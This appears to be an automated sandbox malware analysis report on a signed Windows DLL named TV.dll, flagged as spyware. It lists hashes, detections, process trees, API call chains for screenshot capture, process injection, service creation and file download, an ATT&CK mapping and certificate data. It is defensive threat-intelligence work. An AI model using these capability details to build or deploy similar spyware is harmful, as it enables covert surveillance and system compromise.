Windows Analysis Report TV.bin

Overview

General Information

Sample Name: TV.bin (renamed file extension from bin to dll)
Analysis ID: 483792
MD5: a44f2649c82b35d42e6036d1c75e48c4
SHA1: ee3b00701c97ed107b78ecbdf9d962f1508edc8e
SHA256: 760945429f7ea52c40c75a0fa0424d943e317ec48575c812545cc2c4be5b0510
Tags: dll, HartexLLC, signed, soldewornek

Detection

Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Uses 32bit PE files
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to record screenshots
Contains functionality to delete services
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6240 cmdline: loaddll32.exe 'C:\Users\user\Desktop\TV.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6276 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6324 cmdline: rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6308 cmdline: rundll32.exe C:\Users\user\Desktop\TV.dll,SvcEntry MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6476 cmdline: rundll32.exe 'C:\Users\user\Desktop\TV.dll',SvcEntry MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: TV.dll | Virustotal: Detection: 32%
Source: TV.dll | ReversingLabs: Detection: 26%
Source: TV.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: TV.dll | Static PE information: certificate valid
Source: TV.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: rundll32.exe, 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.255852074.000000006ECAD000.00000002.00020000.sdmp, TV.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA28B0 RtlZeroMemory,RtlZeroMemory,IsWindowEnabled,wsprintfA,IsWindowEnabled,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,3_2_6ECA28B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,3_2_6ECA2DF0
Source: TV.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: TV.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: TV.dll | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: TV.dll | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: TV.dll | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: TV.dll | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: TV.dll | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: TV.dll | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: TV.dll | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: TV.dll | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: TV.dll | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: TV.dll | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: TV.dll | String found in binary or memory: http://ocsp.comodoca.com0
Source: TV.dll | String found in binary or memory: http://ocsp.digicert.com0C
Source: TV.dll | String found in binary or memory: http://ocsp.digicert.com0O
Source: TV.dll | String found in binary or memory: http://ocsp.sectigo.com0
Source: TV.dll | String found in binary or memory: http://www.digicert.com/CPS0
Source: TV.dll | String found in binary or memory: https://sectigo.com/CPS0
Source: TV.dll | String found in binary or memory: https://www.digicert.com/CPS0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA5A00 InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_6ECA5A00
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA66E0 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectA,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,3_2_6ECA66E0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA9BD0 GetCurrentThreadId,GetThreadDesktop,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,3_2_6ECA9BD0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,IsWindowEnabled,IsWindowEnabled,wsprintfA,IsWindowEnabled,IsWindowEnabled,wsprintfA,GetFileAttributesA,IsWindowEnabled,IsWindowEnabled,DeleteFileA,IsWindowEnabled,IsWindowEnabled,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,IsWindowEnabled,IsWindowEnabled,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,IsWindowEnabled,IsWindowEnabled,wsprintfA,IsWindowEnabled,IsWindowEnabled,IsWindowEnabled,IsWindowEnabled,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_6ECA5B40
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA3610 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,3_2_6ECA3610
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,IsWindowEnabled,IsWindowEnabled,RtlMoveMemory,IsWindowEnabled,IsWindowEnabled,PathRemoveFileSpecA,IsWindowEnabled,IsWindowEnabled,PathAddBackslashA,IsWindowEnabled,IsWindowEnabled,SetCurrentDirectoryA,IsWindowEnabled,IsWindowEnabled,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,IsWindowEnabled,IsWindowEnabled,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,IsWindowEnabled,IsWindowEnabled,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,IsWindowEnabled,IsWindowEnabled,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,3_2_6ECA8510
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECAB2D0 RtlMoveMemory,NtFlushInstructionCache,3_2_6ECAB2D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,3_2_6ECA2ED0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA18D0 NtProtectVirtualMemory,3_2_6ECA18D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,3_2_6ECA14E0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,3_2_6ECA4EF0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECAB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,3_2_6ECAB0A0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA2640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,3_2_6ECA2640
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECAB270 NtResumeThread,NtClose,HeapFree,3_2_6ECAB270
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,3_2_6ECA8400
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,3_2_6ECA1C00
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECAAE20 NtOpenThread,3_2_6ECAAE20
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECAAFC0 NtGetContextThread,NtSetContextThread,3_2_6ECAAFC0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECAADE0 NtProtectVirtualMemory,3_2_6ECAADE0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,3_2_6ECA19F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECAB1F0 NtSuspendThread,NtClose,3_2_6ECAB1F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,3_2_6ECA7790
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,3_2_6ECA23B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,3_2_6ECA2750
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,3_2_6ECA6D50
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECAA500 NtQueryVirtualMemory,3_2_6ECAA500
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECAAD39 NtProtectVirtualMemory,3_2_6ECAAD39
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA3700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,3_2_6ECA3700
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA96D0 SwitchDesktop,SetThreadDesktop,LoadLibraryA,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlZeroMemory,GetSystemDirectoryA,PathAddBackslashA,lstrcatA,LoadLibraryExA,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,3_2_6ECA96D0
Source: TV.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA3C60 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,3_2_6ECA3C60
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\TV.dll,SvcEntry
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\TV.dll'
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\TV.dll',SvcEntry
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA4E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,3_2_6ECA4E50
Source: classification engine | Classification label: mal48.winDLL@9/0@0/0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA6480 CoInitializeEx,CoCreateInstance,RtlZeroMemory,VariantInit,CoUninitialize,3_2_6ECA6480
Source: TV.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECAC101 push ecx; ret 3_2_6ECAC114
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA44D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,IsWindowEnabled,wsprintfA,IsWindowEnabled,wsprintfA,IsWindowEnabled,IsWindowEnabled,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,3_2_6ECA44D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA37D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,3_2_6ECA37D0
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA3B60 SvcEntry,IsWindowEnabled,SetCurrentDirectoryA,RegisterServiceCtrlHandlerExW,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,SetServiceStatus,SetServiceStatus,ExitProcess,3_2_6ECA3B60
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECAC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6ECAC1E2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA5130 LogonUserW,GetLastError,CloseHandle,3_2_6ECA5130
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6ECA3220 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_6ECA3220

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Valid Accounts2 | Service Execution12 | Create Account1 | Valid Accounts2 | Valid Accounts2 | OS Credential Dumping | System Time Discovery1 | Remote Services | Screen Capture1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1 |
| Default Accounts | Scheduled Task/Job | Valid Accounts2 | Access Token Manipulation21 | Virtualization/Sandbox Evasion1 | LSASS Memory | Security Software Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Windows Service12 | Windows Service12 | Access Token Manipulation21 | Security Account Manager | Virtualization/Sandbox Evasion1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Process Injection11 | Process Injection11 | NTDS | Account Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | System Owner/User Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll321 | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery13 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |

Behavior Graph

Behavior Graph ID: 483792; Sample: TV.bin; Start date: 15/09/2021; Architecture: WINDOWS; Score: 48
Graph nodes: loaddll32.exe (started; signature: Multi AV Scanner detection for submitted file) starts cmd.exe, rundll32.exe and rundll32.exe; cmd.exe starts rundll32.exe

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
TV.dll | 32% | Virustotal | | Browse
TV.dll | 27% | ReversingLabs | Win32.Trojan.SpywareX |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | URL Reputation | safe |
https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe |
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | TV.dll | false | URL Reputation: safe | unknown
https://sectigo.com/CPS0 | TV.dll | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | TV.dll | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | TV.dll | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | TV.dll | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | TV.dll | false | URL Reputation: safe | unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:483792
Start date:15.09.2021
Start time:13:47:31
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 58s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:TV.bin (renamed file extension from bin to dll)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:29
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal48.winDLL@9/0@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 100% (good quality ratio 95.9%)
  • Quality average: 84%
  • Quality standard deviation: 24.5%
HCA Information:
  • Successful, ratio: 92%
  • Number of executed functions: 3
  • Number of non-executed functions: 83
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
  • Not all processes were analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time | Type | Description
13:48:32 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.743019659267088
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:TV.dll
File size:75256
MD5:a44f2649c82b35d42e6036d1c75e48c4
SHA1:ee3b00701c97ed107b78ecbdf9d962f1508edc8e
SHA256:760945429f7ea52c40c75a0fa0424d943e317ec48575c812545cc2c4be5b0510
SHA512:b8340f06e3446aa91f435f4009557830bbc8e8279321f41198c076e8202869b98c156809cf3fad8f900b569aca2ab6b6a7725a1532e2846b31edec513e84734d
SSDEEP:1536:coaayOa9Z58qTGIT0XhZKfl2MjEzHPggfLD//qQmoz:p1uZ58qTGITey4zJfLD3qQmC
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.l5...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...fRich...f................PE..L..

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:0x1000bfa1
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x613B0BCE [Fri Sep 10 07:39:58 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:a1b64bf7b603bcc5fb4a94a56c86f83e

Authenticode Signature

Signature Valid:true
Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:The operation completed successfully
Error Number:0
Not Before, Not After
  • 6/3/2021 5:00:00 PM 6/4/2022 4:59:59 PM
Subject Chain
  • CN=Hartex LLC, O=Hartex LLC, L=Moscow, C=RU
Version:3
Thumbprint MD5:5D5CA7E8D78224799E8AA101FF486137
Thumbprint SHA-1:319517761E92EC6EEF1966A5994570D46A498093
Thumbprint SHA-256:AC50A5D91A71BA8447EE795FF966E625AEC004E49EB24ADAA366B988686B65A5
Serial:009B576882CCDB891FD6E4A66671F3AC71

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F4020DB6D87h
call 00007F4020DB6F0Eh
pop ebp
jmp 00007F4020DB6B13h
int3
jmp dword ptr [1000D24Ch]
int3
int3
mov edi, edi
push ebp
mov ebp, esp
